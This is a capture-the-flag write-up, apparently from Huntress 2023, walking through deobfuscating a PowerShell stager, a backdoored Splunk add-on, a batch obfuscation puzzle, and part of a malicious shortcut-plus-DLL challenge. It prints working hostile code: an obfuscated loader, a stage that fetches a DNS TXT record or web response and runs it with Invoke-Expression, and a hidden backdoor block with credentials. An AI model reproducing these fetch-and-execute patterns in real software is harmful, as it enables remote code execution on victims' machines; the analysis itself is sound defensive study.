(('. ( $ENv:CoMSpEc[4,24,25]-join'')( " $( Set-variaBle 'OfS''')"+ ( [StriNg] [rEGeX]::mAtcheS( " ))421]RAhC[,'fKI'eCALPeR-  93]RAhC[,)89]RAhC[+84]RAhC[+98]RAhC[( EcalPeRC-  63]RAhC[,'kwl'EcalPeRC-  )')b0Yb0YniOj-]52,42,4[cepSMoC:Vnekwl(.fKI)(DnEOTDAer.)})iicsA::]GnidOcNe.Txet.METsys[,_kwl(REDAeRmaertS.oItCejbO-WEn{HCaERoFfKI)sSERpMoCed::]edOMnOisSErPMoc.NoISSerpMOc.oi[,)b0Y==wDyD4p+Ss/l/i+5GtatJKyfNjO334Vvj6wRyRXe1xy1pB0AXVLMgOwY//WomzzUtBsx/ie0rVZ7xcLiowWMGEVjk7JMfxVmuszOT3XkKu9TvOsrbbcbGyZ6c/gYNpilBK7x5Plc8qUyOhBYVecjNLW42YjM8SwtAaR8IOwm6UwWNmWzCwVrSr7IT2k6Mj1MuKT/oRO5BKK8R3NhDom2AGYpyaTaNg8DAneNoeSjugkTBFTcCPaSH0QjpFywaQyHtPUGDL0BK3lClrHAv4GOpVKUNmGzIDeraEvlpckC9EGgIaf96jSmSMhhRfI72oHzUkDsZoT5nc7MD8W31XqKd4dbtbth1RdSigEaEJNERMLUxVME4PJtUtSIJUZfZEEAJsTdDZNb0Y(gniRTS46esaBmoRF::]tRevnOC[]MAertsYrOmeM.Oi.mETSYs[(MaErtsEtALfeD.NOIsSerPmoc.OI.meTsYStCejbO-WEn('(((noIsseRpXe-ekovni ",'.','RightToLEFt' ) |forEach{$_ })+" $( sV 'oFs''')" ) ')-cREpLACE([cHAr]90+[cHAr]84+[cHAr]54),[cHAr]36-rEPlAce'"',[cHAr]34-rEPlAce'|',[cHAr]124-cREpLACE([cHAr]104+[cHAr]120+[cHAr]54),[cHAr]39)|.($vERboSEpreFeRenCe.tOStrING()[1,3]+'x'-JOin'')
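
For anyone who would rather script that cleanup than do it by hand, here is a minimal Python sketch. It assumes the token table read off the replace chain above (ZT6 is $, a6T is ", RYc is |, hx6 is '); the helper names are mine and purely illustrative. Python's str.replace is case-sensitive like -creplace, while the plain -replace calls are case-insensitive in PowerShell, which makes no difference for this sample.

```python
# Token table read from the -cREpLACE / -rEPlAce chain at the end of the script.
TOKENS = {
    "ZT6": "$",   # [char]90+[char]84+[char]54 -> [char]36
    "a6T": '"',   # -> [char]34
    "RYc": "|",   # -> [char]124
    "hx6": "'",   # [char]104+[char]120+[char]54 -> [char]39
}


def strip_concat(text: str) -> str:
    """Remove the literal '+' sequences that split strings apart."""
    return text.replace("'+'", "")


def peel_layer(text: str) -> str:
    """Hypothetical helper: join split strings, swap tokens, join again."""
    text = strip_concat(text)
    for token, char in TOKENS.items():
        text = text.replace(token, char)
    # Swapping hx6 for a quote exposes a second layer of '+' joins.
    return strip_concat(text)


sample = "RYcforEach{ZT6_ } Womhx6+hx6z'+'zU"
print(peel_layer(sample))
```

The second strip_concat call is the "another layer" mentioned above: the hx6+hx6 pairs only turn into '+' after the token swap.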


From here there is a hard-to-see 'RightToLEFt' near the end. This is the RightToLeft regex option, meant for right-to-left text, passed to [regex]::Matches along with a '.' pattern, so the string is matched one character at a time starting from the end. In effect, it reads that portion of the script in reverse. Reversing that text first, as you can easily spot 'invoke-e' backwards, displays:

invoke-eXpRessIon(((\' ( nEW-ObjeCt  SYsTem.IO.comPreSsION.DefLAtEstrEaM( [sYSTEm.iO.MemOrYstreAM][COnveRt]::FRomBase64STRing(Y0bNZDdTsJAEEZfZUJIStUtJP4EMVxULMRENJEaEgiSdR1htbtbd4dKqX13W8DM7cn5ToZsDkUzHo27IfRhhMSmSj69faIgGE9CkcplvEareDIzGmNUKVpOG4vAHrlCl3KB0LDGUPtHyQawyFpjQ0HSaPCcTFBTkgujSeoNenAD8gNaTaypYGA2moDhN3R8KKB5ORo/TKuM1jM6k2TI7rSrVwCzWmNWwU6mwOI8RaAtwS8MjY24WLNjceVYBhOyUq8clP5x7KBlipNYg/c6ZyGbcbbrsOvT9uKkX3TOzsumVxfMJ7kjVEGMWwoiLcx7ZVr0ei/xsBtUzzmoW//YwOgMLVXA0Bp1yx1eXRyRw6jvV433OjNfyKJtatG5+i/l/sS+p4DyDw==Y0b ) ,[io.cOMpreSSIoN.coMPrESsiOnMOde]::deCoMpRESs )IKfFoREaCH { nEW-ObjeCt Io.StreamReADER( lwk_, [sysTEM.texT.eNcOdinG]::Ascii ) }).reADTOEnD( ) IKf . ( lwkenV:CoMSpec[4,24,25]-jOinY0bY0b)\')-CRePlacE\'lwk\',[ChAR]36-CRePlacE([ChAR]89+[ChAR]48+[ChAR]98),[ChAR]39-RePLACe\'IKf\',[ChAR]124))
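
The reversal itself is a one-liner outside of PowerShell. A small Python sketch, where reverse_text is just an illustrative name and the input is a fragment copied from the reversed portion of the script:

```python
def reverse_text(text: str) -> str:
    """Mirror what matching '.' right-to-left and re-joining does."""
    return text[::-1]


print(reverse_text("noIsseRpXe-ekovni"))  # invoke-eXpRessIon
```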


More string replacement!

-creplace"lwk","$"-creplace"Y0b","'"-replace"IKf","|"


That makes it even more understandable as we get closer to the core code.

invoke-eXpRessIon(((\' ( nEW-ObjeCt  SYsTem.IO.comPreSsION.DefLAtEstrEaM( [sYSTEm.iO.MemOrYstreAM][COnveRt]::FRomBase64STRing('NZDdTsJAEEZfZUJIStUtJP4EMVxULMRENJEaEgiSdR1htbtbd4dKqX13W8DM7cn5ToZsDkUzHo27IfRhhMSmSj69faIgGE9CkcplvEareDIzGmNUKVpOG4vAHrlCl3KB0LDGUPtHyQawyFpjQ0HSaPCcTFBTkgujSeoNenAD8gNaTaypYGA2moDhN3R8KKB5ORo/TKuM1jM6k2TI7rSrVwCzWmNWwU6mwOI8RaAtwS8MjY24WLNjceVYBhOyUq8clP5x7KBlipNYg/c6ZyGbcbbrsOvT9uKkX3TOzsumVxfMJ7kjVEGMWwoiLcx7ZVr0ei/xsBtUzzmoW//YwOgMLVXA0Bp1yx1eXRyRw6jvV433OjNfyKJtatG5+i/l/sS+p4DyDw==' ) ,[io.cOMpreSSIoN.coMPrESsiOnMOde]::deCoMpRESs )|FoREaCH { nEW-ObjeCt Io.StreamReADER( $_, [sysTEM.texT.eNcOdinG]::Ascii ) }).reADTOEnD( ) | . ( $enV:CoMSpec[4,24,25]-jOin'')\')


From here, we can basically read and understand the leftover code. A call to FromBase64String on a long Base64 string, which is then eventually fed into system.io.compression.deflatestream. This can easily be done in Python:

>>> data = 'NZDdTsJAEEZfZUJIStUtJP4EMVxULMRENJEaEgiSdR1htbtbd4dKqX13W8DM7cn5ToZsDkUzHo27IfRhhMSmSj69faIgGE9CkcplvEareDIzGmNUKVpOG4vAHrlCl3KB0LDGUPtHyQawyFpjQ0HSaPCcTFBTkgujSeoNenAD8gNaTaypYGA2moDhN3R8KKB5ORo/TKuM1jM6k2TI7rSrVwCzWmNWwU6mwOI8RaAtwS8MjY24WLNjceVYBhOyUq8clP5x7KBlipNYg/c6ZyGbcbbrsOvT9uKkX3TOzsumVxfMJ7kjVEGMWwoiLcx7ZVr0ei/xsBtUzzmoW//YwOgMLVXA0Bp1yx1eXRyRw6jvV433OjNfyKJtatG5+i/l/sS+p4DyDw=='
>>> dec = base64.b64decode(data)
>>> dec
b'5\x90\xddN\xc2@\x10F_eBHJ\xd5-$\xfe\x041\\T,\xc4D4\x91\x1a\x12\x08\x92u\x1da\xb5\xbb[w\x87J\xa9}w[\xc0\xcc\xed\xc9\xf9N\x86l\x0eE3\x1e\x8d\xbb!\xf4a\x84\xc4\xa6J>\xbd}\xa2 \x18OB\x91\xcae\xbcF\xabx23\x1acT)ZN\x1b\x8b\xc0\x1e\xb9B\x97r\x81\xd0\xb0\xc6P\xfbG\xc9\x06\xb0\xc8ZcCA\xd2h\xf0\x9cLPS\x92\x0b\xa3I\xea\rzp\x03\xf2\x03ZM\xac\xa9``6\x9a\x80\xe17t|(\xa0y9\x1a?L\xab\x8c\xd63:\x93d\xc8\xee\xb4\xabW\x00\xb3ZcV\xc1N\xa6\xc0\xe2<E\xa0-\xc1/\x0c\x8d\x8d\xb8X\xb3cq\xe5X\x06\x13\xb2R\xaf\x1c\x94\xfeq\xec\xa0e\x8a\x93X\x83\xf7:g!\x9bq\xb6\xeb\xb0\xeb\xd3\xf6\xe2\xa4_t\xce\xce\xcb\xa6W\x17\xcc\'\xb9#TA\x8c[\n"-\xcc{eZ\xf4z/\xf1\xb0\x1bT\xcf9\xa8[\xff\xd8\xc0\xe8\x0c-U\xc0\xd0\x1au\xcb\x1d^]\x1c\x91\xc3\xa8\xefW\x8d\xf7:3_\xc8\xa2mj\xd1\xb9\xfa/\xe5\xfe\xc4\xbe\xa7\x80\xf2\x0f'
>>> zlib.decompress(dec)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
zlib.error: Error -3 while decompressing data: incorrect header check


Oh snap! Wrong data type? Nope, this is common with zlib when the data is a raw deflate stream with no zlib header, which is what DeflateStream produces. You eventually learn that you just need to set wbits to a number from -8 to -15, as noted in its documentation. (https://docs.python.org/2/library/zlib.html#zlib.decompress)

>>> zlib.decompress(dec, -8)
b'try {$TGM8A = Get-WmiObject MSAcpi_ThermalZoneTemperature -Namespace "root/wmi" -ErrorAction \'silentlycontinue\' ; if ($error.Count -eq 0) {  $5GMLW = (Resolve-DnsName eventlog.zip -Type txt | ForEach-Object { $_.Strings } ); if ($5GMLW -match \'^[-A-Za-z0-9+/]*={0,3}$\') {  [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($5GMLW))  | Invoke-Expression } } } catch { }'
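
Since this Base64-plus-raw-deflate pairing shows up constantly in PowerShell droppers, it is worth keeping as a small helper. A sketch, with function names of my own choosing; I use -15 rather than -8 because it accepts any window size the compressor may have used. The deflate_b64 helper exists only to build a self-contained demo input.

```python
import base64
import zlib


def inflate_b64(blob: str) -> bytes:
    """Base64-decode, then inflate a raw (headerless) deflate stream."""
    raw = base64.b64decode(blob)
    # Negative wbits means "no zlib header or trailer"; -15 allows the largest window.
    return zlib.decompress(raw, -15)


def deflate_b64(data: bytes) -> str:
    """Inverse helper, used here only to produce a demo input."""
    comp = zlib.compressobj(wbits=-15)
    return base64.b64encode(comp.compress(data) + comp.flush()).decode("ascii")


demo = deflate_b64(b"Write-Output 'hello'")
print(inflate_b64(demo))
```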


Wait, what? This stumped me for longer than it should have. It's calling Resolve-DnsName, but that expects a domain name, not a filename. Since I'm not on Windows I did not even try to run it. Eventually I broke down and tried it in a Windows VM and realized ... eventlog.zip was a literal domain name, not a file name. Going back to my terminal and pulling the TXT record showed more Base64:

$ host -t txt eventlog.zip
eventlog.zip descriptive text "U3RhcnQtUHJvY2VzcyAiaHR0cHM6Ly95b3V0dS5iZS81NjFubmQ5RWJzcz90PTE2IgojZmxhZ3s0MDk1MzczNDdjMmZhZTAxZWY5ODI2YzI1MDZhYzY2MH0jCg=="


This further Base64 decodes to:

'Start-Process "https://youtu.be/561nnd9Ebss?t=16"\n#flag{409537347c2fae01ef9826c2506ac660}#\n', 
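
The last stage can be mimicked offline without ever running it. This sketch takes the TXT record value from above, applies the same Base64 sanity check the PowerShell performs with -match, and decodes instead of piping into Invoke-Expression. The function name is illustrative, and no DNS lookup is performed here.

```python
import base64
import re

# Same pattern the PowerShell stage uses for its -match check.
B64_PATTERN = re.compile(r"^[-A-Za-z0-9+/]*={0,3}$")


def decode_txt_record(txt: str):
    """Return the decoded text if the record looks like Base64, else None."""
    if not B64_PATTERN.match(txt):
        return None
    return base64.b64decode(txt).decode("utf-8")


record = (
    "U3RhcnQtUHJvY2VzcyAiaHR0cHM6Ly95b3V0dS5iZS81NjFubmQ5RWJzcz90PTE2"
    "IgojZmxhZ3s0MDk1MzczNDdjMmZhZTAxZWY5ODI2YzI1MDZhYzY2MH0jCg=="
)
stage = decode_txt_record(record)
print(stage)
print(re.search(r"flag\{[0-9a-f]{32}\}", stage).group(0))
```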

This is the flag and a video of a pleasant chain saw sound.


Backdoored Splunk



This was one of the more unique challenges. Provided was an archive for a Splunk TA (Technology Add-on), a.k.a. a plugin. I don't know much about Splunk, except that most of its customers can no longer afford it, so this was an interesting challenge.

Honestly, I had no clue what I was looking at. Calvin and Hobbes are always here to look on in equal surprise.


In quick review I noticed most of the files were last modified in May 2023, as their mtimes were retained in their archive.

18:09:29-rurik@~/CTF/Huntress_2023/done/Splunk_TA_windows$ stat -x README.txt
  File: "README.txt"
  Size: 170          FileType: Regular File
  Mode: (0644/-rw-r--r--)         Uid: (  501/   rurik)  Gid: (   20/   staff)
Device: 1,4   Inode: 32168160    Links: 1
Access: Sat Mar  9 18:06:12 2024
Modify: Wed May 10 09:27:38 2023
Change: Sat Mar  9 18:06:12 2024
 Birth: Wed May 10 09:27:38 2023

There are two ways to pull on that thread. The more complex is to iterate all of the mtimes to find outliers. This helped reduce the large set down to just 11 files. Furthermore, the 25 Sep time was only for a single file. That is our file of interest.

rurik@~/Splunk_TA_windows$ ls -lR | awk '{print $6, $7, $8}' | sort | uniq

May 10 2023
Sep 19 13:10
Sep 25 12:18
rurik@~/Splunk_TA_windows$ ls -lR | grep "Sep "
drwx------   3 rurik  staff     96 Sep 19 13:10 LICENSES
drwx------   3 rurik  staff     96 Sep 19 13:10 README
drwx------   3 rurik  staff     96 Sep 19 13:10 appserver
drwx------  12 rurik  staff    384 Sep 19 13:10 bin
drwx------  11 rurik  staff    352 Sep 19 13:10 default
drwx------  33 rurik  staff   1056 Sep 19 13:10 lookups
drwx------   3 rurik  staff     96 Sep 19 13:10 metadata
drwx------   8 rurik  staff    256 Sep 19 13:10 static
drwx------   4 rurik  staff    128 Sep 19 13:10 static
drwx------  11 rurik  staff    352 Sep 19 13:10 powershell
-rw-r--r--   1 rurik  staff   6044 Sep 25 12:18 nt6-health.ps1
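
The same outlier hunt can be scripted so it does not depend on how ls formats dates. A rough Python sketch, assuming regular files are all we care about (directories are skipped) and that grouping by calendar day is fine-grained enough; both function names are made up for illustration.

```python
import os
import time
from collections import defaultdict


def group_by_mday(root: str) -> dict:
    """Map 'YYYY-MM-DD' modification dates to the files carrying them."""
    groups = defaultdict(list)
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            mtime = os.stat(path).st_mtime
            day = time.strftime("%Y-%m-%d", time.localtime(mtime))
            groups[day].append(path)
    return dict(groups)


def rarest_days(groups: dict, limit: int = 3) -> list:
    """Return the dates with the fewest files, rarest first."""
    return sorted(groups, key=lambda day: len(groups[day]))[:limit]
```

Calling group_by_mday("Splunk_TA_windows") and then printing the files behind rarest_days(...) should surface the lone late-September file the same way the ls pipeline did.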


The method I actually used after determining the time difference was quick and easy, using the find command. Specify the -mtime option to limit output to only files modified within the last X number of days. An arbitrary number can be used and tuned in. For example, for only files modified within the last 200 days, and then more details on those files:

18:25:53-rurik@~/CTF/Huntress_2023/Splunk_TA_windows$ find ./ -mtime -200
./
.//lookups
.//bin
.//bin/powershell
.//bin/powershell/nt6-health.ps1
.//LICENSES
.//default
.//README
.//static
.//appserver
.//appserver/static
.//metadata
18:27:07-rurik@~/CTF/Huntress_2023/Splunk_TA_windows$ stat `find ./ -mtime -200`
16777220 32168132 drwx------ 15 rurik staff 0 480  "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" "Mar  9 18:06:21 2024" "Sep 19 13:10:10 2023" 4096 0 0 ./
16777220 32168186 drwx------ 33 rurik staff 0 1056 "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" 4096 0 0 .//lookups
16777220 32168165 drwx------ 12 rurik staff 0 384  "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" 4096 0 0 .//bin
16777220 32168168 drwx------ 11 rurik staff 0 352  "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" 4096 0 0 .//bin/powershell
16777220 32168171 -rw-r--r-- 1  rurik staff 0 6044 "Mar  9 18:06:12 2024" "Sep 25 12:18:25 2023" "Mar  9 18:06:12 2024" "Sep 25 12:18:25 2023" 4096 16 0 .//bin/powershell/nt6-health.ps1
16777220 32168136 drwx------ 3  rurik staff 0 96   "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" 4096 0 0 .//LICENSES
16777220 32168149 drwx------ 11 rurik staff 0 352  "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" 4096 0 0 .//default
16777220 32168133 drwx------ 3  rurik staff 0 96   "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" 4096 0 0 .//README
16777220 32168138 drwx------ 8  rurik staff 0 256  "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" 4096 0 0 .//static
16777220 32168145 drwx------ 3  rurik staff 0 96   "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" 4096 0 0 .//appserver
16777220 32168146 drwx------ 4  rurik staff 0 128  "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" 4096 0 0 .//appserver/static
16777220 32168163 drwx------ 3  rurik staff 0 96   "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" "Mar  9 18:06:12 2024" "Sep 19 13:10:10 2023" 4096 0 0 .//metadata


This also reduces the file collection down to a smaller set and, eventually, to the only non-directory: nt6-health.ps1.

Contained within this file were almost 200 lines of PowerShell, none of which I understood. But you don't need to. You can just glance through and find things that jump out as unusual. Doing so, I found these lines:

## Windows Version and Build ##
$WindowsInfo = Get-Item "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion"
# $PORT below is dynamic to the running service of the `Start` button
$OS = @($html = (Invoke-WebRequest http://chal.ctf.games:$PORT -Headers @{Authorization=("Basic YmFja2Rvb3I6dXNlX3RoaXNfdG9fYXV0aGVudGljYXRlX3dpdGhfdGhlX2RlcGxveWVkX2h0dHBfc2VydmVyCg==")} -UseBasicParsing).Content
if ($html -match '<!--(.*?)-->') {
    $value = $matches[1]
    $command = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($value))
    Invoke-Expression $command
})
$OSSP = $WindowsInfo.GetValue("CSDVersion")
$WinVer = $WindowsInfo.GetValue("CurrentVersion")
$WinBuild = $WindowsInfo.GetValue("CurrentBuildNumber")
$OSVER = "$WinVer ($WinBuild)"

A call to Invoke-WebRequest to a domain used by the challenge with a specific auth login. The user name and password are expected within that Base64 blob:

backdoor:use_this_to_authenticate_with_the_deployed_http_server
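
Pulling the credentials out of a Basic authorization value takes only a few lines. A small sketch, with decode_basic_auth being a name I made up; note that this particular blob also encodes a trailing newline, which the strip() call removes.

```python
import base64


def decode_basic_auth(header_value: str):
    """Split 'Basic <base64>' into a (user, password) tuple."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic authorization value")
    decoded = base64.b64decode(token).decode("utf-8").strip()
    user, _, password = decoded.partition(":")
    return user, password


header = (
    "Basic YmFja2Rvb3I6dXNlX3RoaXNfdG9fYXV0aGVudGljYXRl"
    "X3dpdGhfdGhlX2RlcGxveWVkX2h0dHBfc2VydmVyCg=="
)
print(decode_basic_auth(header))
```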

OK, so just make a connection?

5:14:21-rurik@~/CTF/Huntress_2023/Splunk_TA_windows$ curl  -H "Authorization: Basic YmFja2Rvb3I6dXNlX3RoaXNfdG9fYXV0aGVudGljYXRlX3dpdGhfdGhlX2RlcGxveWVkX2h0dHBfc2VydmVyCg==" http://chal.ctf.games:31106

<!-- ZWNobyBmbGFnezYwYmIzYmZhZjcwM2UwZmEzNjczMGFiNzBlMTE1YmQ3fQ== �

We can refer back to the earlier PowerShell that shows it performing a RegEx that mostly matches the result (any error here could be a result of my poor notes). Another Base64 decoding shows the flag:

>>> base64.b64decode('ZWNobyBmbGFnezYwYmIzYmZhZjcwM2UwZmEzNjczMGFiNzBlMTE1YmQ3fQ==')
b'echo flag{60bb3bfaf703e0fa36730ab70e115bd7}'
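
To tie it together, here is a sketch of what the backdoor does with the response, minus the Invoke-Expression. It applies the same regular expression as the PowerShell and only decodes the payload. The body string is an assumption on my part: the Base64 from the curl output wrapped in a well-formed HTML comment, since my captured output was mangled.

```python
import base64
import re

# Same pattern as the PowerShell -match; DOTALL lets the comment span lines.
COMMENT = re.compile(r"<!--(.*?)-->", re.DOTALL)


def extract_command(html: str):
    """Return the decoded command hidden in the first HTML comment, if any."""
    match = COMMENT.search(html)
    if match is None:
        return None
    return base64.b64decode(match.group(1).strip()).decode("utf-8")


# Assumed response body (see the note above); not a verbatim capture.
body = "<!-- ZWNobyBmbGFnezYwYmIzYmZhZjcwM2UwZmEzNjczMGFiNzBlMTE1YmQ3fQ== -->"
print(extract_command(body))
```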


Batchfuscation


One of my favorite challenges. A batch script that is very simple in design, but confusing to review. This is a challenge of pure text substitution, one of my favorite hobbies.

You'll notice over 11,000 lines of script that appear to grow in length and complexity line-by-line.


The idea seems simple and easy to start. If "xeegh" is "/", then find/replace. In DOS/Windows, environment variables are referenced by wrapping the name in percent signs, so this means replacing every "%xeegh%" with "/". This works for the first few, but it then exposes more complex lines like these:


set /a bpquuu=4941956 %% 4941859
cmd /c exit %bpquuu%
set grtoy=%=exitcodeAscii%

Here you see a complex operation to acquire a single byte. The set command is used with the /a argument to evaluate a math equation. Here, "4941956 %% 4941859" is a modulo operation that results in the number 97, the ASCII code for "a". The script then runs "cmd /c exit %var%". This simply runs a new instance of cmd.exe solely to run the command "exit 97". Once a command terminal is closed, or technically any program within it, Windows stores its exit code. This is normally 0 for a normal exit, but the previous command line forces it to be 97. Reading %=exitcodeAscii% then returns that exit code as its ASCII character.

That is three lines of code to create:

set grtoy=a
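
As a worked example of that arithmetic, here is a small Python sketch that decodes one such triple without resorting to eval(). It assumes the three lines are spaced as described in the text ("set /a", " %% ", "cmd /c exit"); the regular expressions and the decode_triplet name are mine.

```python
import re

SET_A = re.compile(r"^set /a (\w+)=(\d+) %% (\d+)$")
SET_ASCII = re.compile(r"^set (\w+)=%=exitcodeAscii%$")


def decode_triplet(lines):
    """Turn a set /a, cmd /c exit, set ...=%=exitcodeAscii% triple into (name, char)."""
    math = SET_A.match(lines[0].strip())
    assign = SET_ASCII.match(lines[2].strip())
    if math is None or assign is None:
        raise ValueError("unexpected line shape")
    code = int(math.group(2)) % int(math.group(3))  # plain arithmetic, no eval()
    return assign.group(1), chr(code)


triplet = [
    "set /a bpquuu=4941956 %% 4941859",
    "cmd /c exit %bpquuu%",
    "set grtoy=%=exitcodeAscii%",
]
print(decode_triplet(triplet))  # ('grtoy', 'a')
```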

Later on, the code obfuscation just grows out of control with eventual hundreds of substitutions required. This is a job for automation. We can parse the script line-by-line and interpret each result. As a single character assignment requires multiple lines, we can set a simple state to treat them as sets. First, parse the modulo equation out by searching for the presence of "set /a", parsing the numbers, and running an eval() on the equation. Something you would absolutely never do in real life, of course. Yet, everyone does. Carry forward that byte until another set is found. If this line contains "exitcodeAscii", and there is a byte carried forward, then parse the variable name and assign the byte. And remember to reset the state of the carried byte so that the code knows to treat the next line as a new block.

replacements = {}

def replace_strs(code):
    new_code = code
    for key, value in replacements.items():
        new_code = new_code.replace(key, value)
    return new_code

def parse(code):
    global replacements
    carry_byte_val = ''
    for orig_line in code:
        line = orig_line.strip('\n')
        line = replace_strs(line)
        if line[:7] == 'set /a ':
            equation = line.split('=')[1]
            equation = equation.replace(' %% ', ' % ')
            carry_byte_val = chr(eval(equation))
            line = line.replace('/a ', '')
        elif line[:3] == 'set':
            var = line.split('set')[1].split('=')[0].strip()
            if 'exitcodeAscii' in line and carry_byte_val:
                value = carry_byte_val
                carry_byte_val = ''
            else:
                value = line.split('=')[1][0]
            replacements['%{}%'.format(var)] = value
        print(line)

data = open('batchfuscation', 'r').readlines()
parse(data)


When run, more lines of obfuscation appear. 

rem set xjnhkbhki=piyyreuxgwvafwtz
::set kyqjrobznfcjrlogdhalniqwjvxdtklyjzajcdkulwrsqrgdhcmbbpbz=dflnnmopuyiavetpibufiidl
rem set scahzpgynzthblbrgbfkzacckwkkjevkqsjkocewwpoofuxuoylvpl=dgzmfpwso


However, these are all preceded with a "rem" (Batch shorthand for a remark, or comment) or a "::", which Batch parses as a label (the mechanism behind goto) and which is commonly used as a comment. None of these matter as they don't actually do anything. However, upon filtering those from the output, nothing popped out as a flag. Going back to the new script, over 1,000 lines long, there were no duplicate lines. Maybe there was another pattern in play, so I sorted the output and paged through it. Immediately, the key area jumped out:

::set hqtjrafvwrwtfdfpzcfrxld=dqtitaarfravijxdkkdozhlferpfhklzbqo
::set hrklgmqdpnofocaepmobfxglgoypff=zgfwuaniobviqwpzjbohziguekxjujcvunaeejsmdrkivhipmvohh
::set flag_character12=e
::set flag_character13=3
::set flag_character14=d
::set flag_character15=0
::set flag_character16=b
::set flag_character17=5
::set flag_character18=b
::set flag_character19=f
::set flag_character1=f

Excellent. The flag is being built one byte at a time, though out of order. I can now add that into my script and build the flag. Here is where many people get caught in Python. Strings are immutable. You cannot make a string and change individual bytes in it. Instead, you make a list of characters like "value = [''] * 50" and convert it to a string later.

replacements = {}

def replace_strs(code):
    new_code = code
    for key, value in replacements.items():
        new_code = new_code.replace(key, value)
    return new_code

def parse(code):
    global replacements
    flag = [''] * 50
    carry_byte_val = ''
    for orig_line in code:
        line = orig_line.strip('\n')
        line = replace_strs(line)
        if line[:7] == 'set /a ':
            equation = line.split('=')[1]
            equation = equation.replace(' %% ', ' % ')
            carry_byte_val = chr(eval(equation))
            line = line.replace('/a ', '')
        elif line[:3] == 'set':
            var = line.split('set')[1].split('=')[0].strip()
            if 'exitcodeAscii' in line and carry_byte_val:
                value = carry_byte_val
                carry_byte_val = ''
            else:
                value = line.split('=')[1][0]
            replacements['%{}%'.format(var)] = value
        elif 'flag_character' in line:
            pos = int(line.split('=')[0].split('flag_character')[1])
            flag_byte = line.split('=')[1].strip()
            flag[pos] = flag_byte
    return flag

data = open('batchfuscation', 'r').readlines()
flag = parse(data)
print(''.join(flag))

Parsing out the offset and the value, the flag is finally formed:

19:02:59-rurik@~/CTF/Huntress_2023$ python batchfuscation.py
flag{acad67e3d0b5bf31ac6639360db9d19a}
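
If you would rather not guess at a maximum flag length, the assembly step can also be done with a dictionary keyed by position. This is an alternative sketch, not what I ran during the CTF; the regular expression and function name are illustrative, and the sample holds only a few of the lines shown earlier.

```python
import re

FLAG_CHAR = re.compile(r"flag_character(\d+)=(.)")


def assemble(lines):
    """Collect (position, character) pairs and join them in position order."""
    chars = {}
    for line in lines:
        match = FLAG_CHAR.search(line)
        if match:
            chars[int(match.group(1))] = match.group(2)
    return "".join(chars[pos] for pos in sorted(chars))


sample = [
    "::set flag_character12=e",
    "::set flag_character13=3",
    "::set flag_character14=d",
    "::set flag_character1=f",
]
print(assemble(sample))  # fe3d
```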


Crab Rave


As someone who was an avid Beat Saber player, and hopes to be again soon, Crab Rave is near to my heart. The organizers split this into an Easy and a Hard challenge. They are literally the same challenge, but Easy did not have its symbols stripped. RE on training wheels. So, I focused on the harder one as it is more realistic.

This challenge came with two files, a DLL and a Windows shortcut semi-disguised as a csv:

company_financial_report_SAFE_NO_VIRUSES.csv.lnk: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=101, Archive, ctime=Fri Jan 15 05:55:23 2021, mtime=Tue Oct 10 15:22:28 2023, atime=Fri Jan 15 05:55:23 2021, length=289792, window=hide
ntcheckos.dll:                                    PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows

The shortcut can easily be parsed by using Silas Cutler's LnkParse script:

20:40:34-rurik@~/CTF/Huntress_2023/done/blog/crab_rave_harder$ lnkparse ./company_financial_report_SAFE_NO_VIRUSES.csv.lnk
Windows Shortcut Information:
   Link CLSID: 00021401-0000-0000-C000-000000000046
   Link Flags: HasTargetIDList | HasLinkInfo | HasRelativePath | HasArguments | HasIconLocation | IsUnicode | HasExpIcon - (16619)
   File Flags: FILE_ATTRIBUTE_ARCHIVE - (32)
   Creation Timestamp: 2021-01-15 00:55:23.286643+00:00
   Modified Timestamp: 2021-01-15 00:55:23.291147+00:00
   Accessed Timestamp: 2023-10-10 10:22:28.019777+00:00
<removed for brevity>
   DATA
      Relative path: ..\..\..\..\..\Windows\System32\cmd.exe
      Command line arguments: /c ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && C:\Windows\System32\rundll32.exe ntcheckos.dll,DLLMain
      Icon location: C:\Windows\System32\imageres.dll
<removed for brevity>

The most important items there are the call to cmd.exe and its command line, forming:

cmd.exe /c ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && ping -n 1 127.0.0.1 > nul && C:\Windows\System32\rundll32.exe ntcheckos.dll,DLLMain

Uniquely, there are multiple pings used as short sleeps (ping -n 1 127.0.0.1), but it does eventually run the supplied ntcheckos.dll by calling its DLLMain export through rundll32.exe. This at least tells us what to look at in the binary.

Opening the binary we see a standard 64-bit DLL. Before digging into the binary, we look at strings. There are quite a few that suggest this is a Rust binary.


The first thing that stands out is two calls to the same subroutine. Each sends in a unique set of binary data, a length, then the same long string value with its length:


